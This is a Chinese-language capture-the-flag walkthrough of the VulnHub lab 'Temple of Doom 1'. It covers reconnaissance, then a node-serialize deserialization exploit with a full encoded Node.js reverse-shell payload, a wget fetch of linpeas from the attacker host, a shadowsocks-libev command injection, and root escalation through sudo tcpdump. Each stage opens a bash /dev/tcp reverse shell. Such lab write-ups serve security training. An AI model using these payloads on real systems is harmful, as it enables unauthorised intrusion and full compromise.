准备工作
靶机基本信息
靶机名称:
Temple Of Doom 1
操作系统:Linux
虚拟机软件:VirtualBox
网络连接方式:桥接至物理网络
渗透测试目标:获取靶机root权限和flag文件内容下载地址:1. Temple of Doom: 1 ~ VulnHub
环境配置
从分享的网盘链接中下载靶机压缩包并解压后,点击VMware Workstation主页的File => Open按钮,在弹出的文件选择窗口中选中Temple_Of_Doom.ovf文件打开后即可导入靶机。
信息收集
IP地址发现
在对靶机进行渗透之前,我们首先使用netdiscover对其进行IP地址探测:
shell
netdiscover -r 192.168.2.0/24
可以发现靶机IP地址为192.168.2.131。
防火墙探测
得知靶机IP地址之后,我们首先使用Ping对其进行网络连通性测试:
shell
└─# ping -c 4 192.168.2.131
PING 192.168.2.131 (192.168.2.131) 56(84) bytes of data.
64 bytes from 192.168.2.131: icmp_seq=1 ttl=64 time=1.64 ms
64 bytes from 192.168.2.131: icmp_seq=2 ttl=64 time=0.902 ms
64 bytes from 192.168.2.131: icmp_seq=3 ttl=64 time=0.848 ms
64 bytes from 192.168.2.131: icmp_seq=4 ttl=64 time=0.871 ms
--- 192.168.2.131 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3006ms
rtt min/avg/max/mdev = 0.848/1.064/1.637/0.331 ms可以发现攻击机和靶机之间的连通性良好。
接下来我们尝试使用Nmap发现TCP ACK包对其进行网络防火墙探测:
shell
┌──(root㉿attacker)-[/home/hacker]
└─# nmap -sA -p- 192.168.2.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-27 10:23 CST
Nmap scan report for 192.168.2.131 (192.168.2.131)
Host is up (0.00029s latency).
All 65535 scanned ports on 192.168.2.131 (192.168.2.131) are in ignored states.
Not shown: 65535 unfiltered tcp ports (reset)
MAC Address: 00:0C:29:D5:F5:FD (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.50 seconds无法确定防火墙状态,直接进行网络端口扫描。
网络端口扫描
下面使用Nmap发送TCP SYN包,扫描靶机端口、软件版本和操作系统特征:
shell
nmap -sS -sV -O -p- -oN ./tcp_result.txt 192.168.2.131
nmap -sC -sU -sV -T4 -oN ./udp_result.txt 192.168.2.131TCP端口扫描结果
UDP端口扫描结果
可以看到靶机开放了如下端口:
| 端口 | 传输层协议 | 应用层协议 | 详细信息 |
|---|---|---|---|
| 22 | TCP | SSH | OpenSSH 7.7 (protocol 2.0) |
| 666 | TCP | HTTP | Node.js Express framework |
同时确定靶机操作系统内核版本大致为Linux 3.2 - 4.9。
服务探测
SSH服务(22端口)
使用Netcat确定端口Banner信息:
shell
┌──(root㉿attacker)-[/home/hacker/Documents/vulnhub_notes/temple_of_doom]
└─# nc -nv 192.168.2.131 22
(UNKNOWN) [192.168.2.131] 22 (ssh) open
SSH-2.0-OpenSSH_7.7尝试使用ssh命令连接靶机的root用户,但靶机长时间未响应,判断靶机SSH服务已经损坏。
Web应用程序(666端口)
使用浏览器打开网站主页(刷新一次 ):http://192.168.2.131:666/
发现该页面调用了Node.Js的反序列化模块 ,怀疑存在反序列化漏洞。该页面的请求头如下:
text
GET / HTTP/1.1
Host: 192.168.2.131:666
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: profile=eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D
Upgrade-Insecure-Requests: 1将Cookie的内容进行Base64解码后,发现内容如下:
text
{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":Friday, 13 Oct 2018 00:00:00 GMT"}%3D发现JSON内容中的Expires字段值前少了一个双引号。将其补全并进行Base64编码并发送后发现页面无报错,显示如下:
推测该页面的功能只是从Cookie中接收经Base64编码后序列化的JSON数组,对其进行反序列化后取出username元素中的值并将其拼接打印在页面上。
渗透测试
经过对已知信息的整理分析,最终决定尝试使用CVE-2017-5941漏洞对其进行渗透。
我们使用Node.Js-Security-Course工具来生成反弹Shell的Node代码:
shell
git clone https://github.com/ajinabraham/Node.Js-Security-Course.git
chmod -R 777 ./Node.Js-Security-Course
cd ./Node.Js-Security-Course
python2 ./nodejsshell.py 192.168.2.50 443成功输出Payload:
接下来我们需要编写一段Node.Js代码将其序列化:
js
var revshell = {
rce : function(){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,50,46,53,48,34,59,10,80,79,82,84,61,34,52,52,51,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}
}
var serialize = require('node-serialize');
console.log(serialize.serialize(revshell));这段代码定义了恶意对象类revshell,然后引入了node-serialize序列化工具模块,随后将恶意类序列化之后打印输出。
执行结果如下:
我们将以上Payload复制到BurpSuite的编码器中,在JSON数组元素rce的字符串值末尾加上函数调用符号()后,将其进行Base64编码;随后在编码后的字符串末尾加上%3D后,将其作为请求Cookie进行发送;同时使用如下命令在本地443端口启动监听:
shell
rlwrap nc -lvnp 443成功接收到反弹Shell:
权限提升
本地信息收集
在获得靶机低权限Shell时,我们可以上传LinPeas工具进行本地信息收集。
shell
wget http://192.168.2.50:9000/linpeas.sh
chmod 700 ./linpeas.sh
./linpeas.sh基本信息
用户信息
进程信息
计划任务信息
特殊权限文件
可以收集到如下信息:
- 靶机的Web目录路径为
/home/nodeadmin/.web - 靶机较高权限的用户有:
root、nodeadmin、fireman - 靶机的操作系统内核版本较老,为
Linux 4.16.3,Sudo版本为1.8.22b1 - 用户
fireman运行了一个进程,可执行文件路径为/usr/local/bin/ss-manager
ShadowSocks提权
发现了fireman用户进程的绝对路径之后,我们尝试执行该程序 (在命令后加-V尝试确定该程序的作用):
shell
[nodeadmin@192 ~]$ /usr/local/bin/ss-manager -V
/usr/local/bin/ss-manager -V
2024-01-27 21:03:36 ERROR: Unrecognized option: (null)
shadowsocks-libev 3.1.0
maintained by Max Lv <[email protected]> and Linus Yang <[email protected]>
usage:
ss-manager
-s <server_host> Host name or IP address of your remote server.
-p <server_port> Port number of your remote server.
-l <local_port> Port number of your local server.
-k <password> Password of your remote server.
......可以发现该程序为代理软件ShadowSocks的主程序,版本为shadowsocks-libev 3.1.0。
尝试查找关于该版本的漏洞:
shell
searchsploit shadowsocks
可以看到正好有一个该版本的漏洞。查看:
text
Proof of Concept
----------------
As passed configuration requests are getting executed, the following command
will create file "evil" in /tmp/ on the server:
nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"||touch
/tmp/evil||"}
The code is executed through shadowsocks-libev/src/manager.c.
If the configuration file on the file system is manipulated, the code
would get executed as soon as a Shadowsocks instance is started from
ss-manage, as long as the malicious part of the configuration has not
been overwritten.可以得知要复现该漏洞,首先需要使用Netcat连接靶机8839/udp端口,随后输入 add: {"server_port":8003, "password":"test", "method":"||<command>||"}并回车。
这里我们执行反弹Shell到攻击机80端口的命令:
shell
[nodeadmin@192 ~]$ nc -u 127.0.0.1 8839
nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"||bash -i >& /dev/tcp/192.168.2.50/80 0>&1||"}
add: {"server_port":8003, "password":"test", "method":"||bash -i >& /dev/tcp/192.168.2.50/80 0>&1||"}可以看到成功提权至fireman用户:
TCPDump提权
切换回fireman用户的家目录,查看所有文件:
shell
[fireman@192 root]$ cd ~
cd ~
[fireman@192 ~]$ ls -lA
ls -lA
total 36
-rw------- 1 fireman fireman 2151 Jun 7 2018 .bash_history
-rw-r--r-- 1 fireman fireman 18 Mar 15 2018 .bash_logout
-rw-r--r-- 1 fireman fireman 193 Mar 15 2018 .bash_profile
-rw-r--r-- 1 fireman fireman 231 Mar 15 2018 .bashrc
drwx------ 3 fireman fireman 4096 Jun 3 2018 .config
-rw------- 1 fireman fireman 16 Jun 3 2018 .esd_auth
drwxr-xr-x 4 fireman fireman 4096 Apr 25 2018 .mozilla
drwxrwxr-x 2 fireman fireman 4096 Jun 3 2018 .shadowsocks
drwx------ 2 fireman fireman 4096 Jun 2 2018 .ssh尝试使用sudo -l命令查看可以运行哪些命令:
shell
[fireman@192 ~]$ sudo -l
sudo -l
Matching Defaults entries for fireman on 192:
!visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fireman may run the following commands on 192:
(ALL) NOPASSWD: /sbin/iptables
(ALL) NOPASSWD: /usr/bin/nmcli
(ALL) NOPASSWD: /usr/sbin/tcpdump依次查询iptables、nmcli、tcpdump三条命令的提权方法,最后发现tcpdump命令可以使用如下方法提权:
大意是可以在某个目录下新建一个具有执行权限的恶意脚本文件,随后使用TCPDump命令的-z参数加载脚本文件执行。完整命令如下:
shell
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z <脚本文件路径> -Z root这里我们执行反弹Shell命令到攻击机8000端口的命令。命令如下:
shell
touch /tmp/getroot.sh
chmod 777 /tmp/getroot.sh
echo "#! /bin/bash" >> /tmp/getroot.sh
echo "bash -i >& /dev/tcp/192.168.2.50/8000 0>&1"
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/getroot.sh -Z root
成功!!
Flag文件展示
文件名称:
flag.txt
文件路径:/root/flag.txt
文件大小:1.9 KiB
MD5:6f14ebde10f6a78a652a632f3b1cfae6
SHA256:cb56c037ed80a9504fc019ced4a5d85508f100e62bf2a474d4320f2554adcc6c
文件内容截图:
